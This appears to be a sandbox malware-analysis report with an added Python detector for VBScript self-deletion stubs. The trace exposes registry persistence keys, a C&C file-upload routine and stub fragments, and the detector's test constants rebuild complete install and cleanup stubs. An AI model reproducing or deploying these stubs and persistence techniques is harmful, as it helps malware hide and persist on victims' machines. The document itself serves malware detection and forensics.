                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004076D6
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004076E3
                                                • exit.MSVCRT ref: 004076EF
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004076F8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407701
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$G@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@$V01@V10@$??0?$basic_string@G@1@@$V01@@$??4?$basic_string@$FileY?$basic_string@$V10@0@wcslen$AttributesCopy$?length@?$basic_string@CreateDirectoryExecuteShell_wgetenvexitwcscmp
                                                • String ID: """, 0$6$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$|AA
                                                • API String ID: 740851534-1417474533
                                                • Opcode ID: 79a3ecc4cd0975fb733b225ccd06be5607290740e68429ae2c3a586f11c4d97f
                                                • Instruction ID: d1ab76961e62da3444ff14cf7ab97297d48a075a471a17b17a88d7526e7a0a1d
                                                • Opcode Fuzzy Hash: 79a3ecc4cd0975fb733b225ccd06be5607290740e68429ae2c3a586f11c4d97f
                                                • Instruction Fuzzy Hash: 8EC124B1900159AFCF05AFA0EC59DEF7B3CBB14306B048079F506E61A1EB789A49CB5D
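The string constants in the trace above (WScript.Sleep 1000, Set fso = CreateObject("Scripting.FileSystemObject"), fso.DeleteFile, CreateObject("WScript.Shell").Run "cmd /c "", fso.DeleteFile(Wscript.ScriptFullName), the %Temp% path resolved with _wgetenv plus \install.vbs, and the ShellExecuteW call with the open verb) are the pieces of the Pony Loader self-deletion script flagged in the signature list, and the next function on this page assembles the On Error Resume Next / while fso.FileExists ... wend / fso.DeleteFolder cleanup variant from the same FileSystemObject calls. The Python below is an added example, not Joe Sandbox output and not the sample's own code: it recognises both stub shapes by their marker combination, pulls out the paths each stub deletes (useful forensic leads once the files themselves are gone), and scans a directory such as %Temp% for matching *.vbs files. The line layout of the two reconstructed scripts and every path in them are assumptions made for this example.

```python
"""Recognise the Pony Loader-style VBS self-deletion stubs whose string
fragments appear in the API trace of this report. Added example; not
Joe Sandbox output and not code from the analysed sample."""
import re
from pathlib import Path

# One regex per literal the trace shows the sample concatenating into the
# script. VBScript is case-insensitive, so every pattern is too.
MARKERS = {
    "sleep": re.compile(r"\bWScript\.Sleep\s+\d+", re.I),
    "on_error": re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I),
    "fso_create": re.compile(r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)', re.I),
    "run_cmd": re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)\.Run\s+"cmd\s+/c', re.I),
    "wait_loop": re.compile(r"\bwhile\s+fso\.FileExists\(.*?\)[\s\S]*?\bwend\b", re.I),
    "delete_folder": re.compile(r"\bfso\.DeleteFolder\b", re.I),
    "delete_self": re.compile(r"\bfso\.DeleteFile\s*\(\s*WScript\.ScriptFullName\s*\)", re.I),
}

# Quoted or bare path argument of an fso.DeleteFile / fso.DeleteFolder
# statement. The self-delete form "fso.DeleteFile(Wscript.ScriptFullName)" has
# no whitespace after the method name, so it never matches here.
_TARGET = re.compile(r'\bfso\.Delete(?:File|Folder)\s+"?([^"\r\n()]+?)"?[ \t]*(?:\r?\n|$)', re.I)


def matched_markers(script: str) -> list[str]:
    """Names of all markers present, in MARKERS order."""
    return [name for name, rx in MARKERS.items() if rx.search(script)]


def classify(script: str) -> str:
    """Map the marker set onto the two stub shapes seen in the trace.

    Both end with fso.DeleteFile(Wscript.ScriptFullName). The install stub
    additionally relaunches a copied binary through WScript.Shell.Run; the
    cleanup stub spins on fso.FileExists until the binary is gone.
    """
    hits = set(matched_markers(script))
    if not {"fso_create", "delete_self"} <= hits:
        return "no-match"
    if "run_cmd" in hits:
        return "install-stub"
    if "wait_loop" in hits or "delete_folder" in hits:
        return "cleanup-stub"
    return "self-delete-only"


def delete_targets(script: str) -> list[str]:
    """Paths the stub removes besides itself: the dropped binary and, in the
    cleanup variant, its folder."""
    return [m.group(1).strip() for m in _TARGET.finditer(script)]


def scan_files(files: dict) -> dict:
    """Classify an in-memory {name: content} mapping; only hits are returned."""
    out = {}
    for name, content in files.items():
        verdict = classify(content)
        if verdict != "no-match":
            out[name] = (verdict, delete_targets(content))
    return out


def scan_dir(directory) -> dict:
    """Same over *.vbs files on disk, e.g. the %Temp% folder the trace builds
    with _wgetenv before appending \\install.vbs."""
    files = {}
    for p in Path(directory).rglob("*.vbs"):
        try:
            files[str(p)] = p.read_text(errors="replace")
        except OSError:
            continue
    return scan_files(files)


# Constructed samples. The fragment order follows the concatenation sequence
# in the trace; the exact layout and every path are assumptions.
INSTALL_STUB = (
    "WScript.Sleep 1000\n"
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'fso.DeleteFile "C:\\Users\\user\\AppData\\Local\\Temp\\file.exe"\n'
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\ProgramData\\Example\\copy.exe""", 0\n'
    "fso.DeleteFile(Wscript.ScriptFullName)\n"
)
CLEANUP_STUB = (
    "On Error Resume Next\n"
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'while fso.FileExists("C:\\ProgramData\\Example\\copy.exe")\n'
    'fso.DeleteFile "C:\\ProgramData\\Example\\copy.exe"\n'
    "wend\n"
    'fso.DeleteFolder "C:\\ProgramData\\Example"\n'
    "fso.DeleteFile(Wscript.ScriptFullName)\n"
)
BENIGN = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'fso.CopyFile "C:\\logs\\a.txt", "D:\\backup\\a.txt"\n'
)

if __name__ == "__main__":
    for name, script in (("install", INSTALL_STUB), ("cleanup", CLEANUP_STUB), ("benign", BENIGN)):
        print(name, classify(script), matched_markers(script), delete_targets(script))
```

The verdict deliberately requires both the FileSystemObject creation and the self-delete line, so ordinary admin scripts that merely use FileSystemObject (the BENIGN sample) stay silent; the remaining markers only refine the verdict and give the analyst the deleted paths to chase in MFT or USN journal records.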

                                                 Control-flow Graph
                                                 • Rendered graph not reproduced here (legend: Executed / Not Executed). Function 0040770C: basic blocks 692-743, entry block 692 (40770C-407724, call 0040A109), exit() block 743 (407ACD-407ACE, reached from blocks 738 and 742). External calls on the graph: GetModuleFileNameW, RegDeleteKeyA, SetFileAttributesW (two sites), _wgetenv, ShellExecuteW, exit; internal calls to 0040A109, 00406079, 004100C6, 0041178F, 0040AD45, 0040AA65, 0040A9EF and 004118F7. The per-block MSVCP60 basic_string calls are listed under APIs below.
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 0040774C
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 00407771
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 00407795
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(explorer.exe,?,00000001,00419BC8,6C9BAFB0,00000001), ref: 004077C4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(C:\WINDOWS\system32\userinit.exe,?,00000001,00419BC8,6C9BAFB0,00000001), ref: 004077F2
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 00407815
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419BC8,6C9BAFB0,00000001), ref: 0040784A
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407853
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000208,00000000), ref: 00407873
                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045F8,00000000,00000000,004137F0,00407AF8,00000000,004137F0,6C9BB310), ref: 0040608E
                                                  • Part of subcall function 00406079: UnhookWindowsHookEx.USER32(00000000), ref: 00406097
                                                  • Part of subcall function 00406079: TerminateThread.KERNEL32(004045D8,00000000), ref: 004060A7
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00407891
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 004078BF
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004078D1
                                                • SetFileAttributesW.KERNEL32(00000000), ref: 004078D8
                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 004078EA
                                                • _wgetenv.MSVCRT ref: 00407905
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00407910
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040791B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407926
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00407938
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00407948
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407953
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00407972
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00407982
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040798F
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040799B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004079A4
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004079AD
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004079B6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00414294), ref: 004079D4
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004079DF
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004079EC
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004079F8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407A01
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407A0A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407A13
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00407A27
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419BA0,004137F0), ref: 00407A2F
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",00419BA0,00414294), ref: 00407A46
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00414294), ref: 00407A53
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00414294), ref: 00407A5F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407A68
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00414294), ref: 00407A71
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00407A7F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407A8B
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00407A95
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407AA1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 00407ABA
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00407AC7
                                                • exit.MSVCRT ref: 00407ACE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@?c_str@?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$??0?$basic_string@$D@2@@std@@D@std@@V01@V10@Y?$basic_string@$G@1@@$FileTerminateV01@@V10@@$??9std@@AttributesD@1@@Thread$?length@?$basic_string@?size@?$basic_string@ExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                                • String ID: ")$C:\WINDOWS\system32\userinit.exe$EXEpath$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Shell$Software\Microsoft\Windows NT\CurrentVersion\Winlogon\$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$Userinit$\uninstall.vbs$explorer.exe$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                • API String ID: 357535342-2377545745
                                                • Opcode ID: 8e4ede0bd83c1d490560549dff18f7c85ac3cba2774f96d414c8b9e56eff4302
                                                • Instruction ID: f63d6aa835ee4dab972c5fe5023ef2924f9ab84ac1c1da1ebb1d2ac6b1838751
                                                • Opcode Fuzzy Hash: 8e4ede0bd83c1d490560549dff18f7c85ac3cba2774f96d414c8b9e56eff4302
                                                • Instruction Fuzzy Hash: 1FA166B19001097BDB00EBA0ED59EEF7B7CAB54306F1480BAF505A21D1DB785B89CB6D

                                                Control-flow Graph (function 00403695; graph image not reproduced)
                                                APIs
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004036C4
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 004036E8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000053,?,?,?,?,?,?), ref: 00403709
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 004036F2
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • GetFileSize.KERNEL32(00000000,?), ref: 0040371C
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 0040374B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 00403769
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 0040377A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040378B
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00403794
                                                • ??2@YAPAXI@Z.MSVCRT(0000FDE8), ref: 004037E1
                                                • SetFilePointer.KERNEL32(?,?,?,?), ref: 004037F5
                                                • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403809
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403819
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040382F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A3C
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A45
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403A4E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$File$D@2@@0@G@2@@std@@G@std@@Hstd@@V?$basic_string@$D@1@@G@1@@V10@0@$??2@CreatePointerReadSizeV01@@V10@@socket
                                                • String ID: Uploading file to C&C: $[INFO]
                                                • API String ID: 534860933-3151135581
                                                • Opcode ID: 29b8a269fb9bf56a9e90319054afe079c84013b7625e06aa0f10233bc34decda
                                                • Instruction ID: 98c3deb803e71fa0886ad6ae057fd2c93e61dbf9a11ac3df4f9a8e9669eff77e
                                                • Opcode Fuzzy Hash: 29b8a269fb9bf56a9e90319054afe079c84013b7625e06aa0f10233bc34decda
                                                • Instruction Fuzzy Hash: 1BC1FA71C00109ABDF04EFA1DC49DEEBB78FF15305F1081AAF415A3191EA399B49CBA8

                                                Control-flow Graph (function 00411C60; graph image not reproduced)
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00411C80
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 00411C96
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00411CB7
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00411CD6
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00411D01
                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 00411D7E
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00414B94,?,00414B94,?,00414B94,?,00414B94,?,00414B94,?,00414B94,0041417C), ref: 00411DBE
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00414B94,0041417C), ref: 00411DCE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                • API String ID: 1820998543-3714951968
                                                • Opcode ID: 3a7fa71a5b00113178a47ffbaed4b7d14abce261d46f82509c17fe487a0f0748
                                                • Instruction ID: 52b6449ae2930170a8c194f549236c2453a2cf2de6ef20e039af0df2fb4576ac
                                                • Opcode Fuzzy Hash: 3a7fa71a5b00113178a47ffbaed4b7d14abce261d46f82509c17fe487a0f0748
                                                • Instruction Fuzzy Hash: 4491CCB2800119AFCF10EF90DD49EEFBB7CAF14305F1041A6B50AA2065EB745B99CF68
                                                APIs
                                                • CreateMutexA.KERNEL32(00000000,00000001,00419970,00419BC8,00000000), ref: 00409D8E
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00409DA1
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00409DAE
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409DB7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000208,00000000), ref: 00409DD6
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • exit.MSVCRT ref: 00409DF0
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409DFD
                                                • exit.MSVCRT ref: 00409E1A
                                                • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 00409E29
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00409E35
                                                • CloseHandle.KERNEL32(80000001), ref: 00409E3E
                                                • GetCurrentProcessId.KERNEL32 ref: 00409E44
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 00409E52
                                                • PathFileExistsW.SHLWAPI(?), ref: 00409E71
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00409E86
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409E90
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00409ED4
                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00409EEF
                                                • lstrcatW.KERNEL32(?,.exe), ref: 00409F01
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 00409F13
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409F1D
                                                  • Part of subcall function 004118F7: CreateFileW.KERNEL32(6C9BB310,40000000,00000000,00000000,00000002,00000080,00000000,004137F0,6C9BB310), ref: 00411934
                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00409F43
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C,80000001), ref: 00409F55
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041457C), ref: 00409F6F
                                                • Sleep.KERNEL32(000001F4), ref: 00409F86
                                                • exit.MSVCRT ref: 00409F9B
                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00419958,004137F0,00000000,80000001,00419970), ref: 00409FBD
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00409FE9
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00409FF2
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000410,00000000), ref: 0040A00F
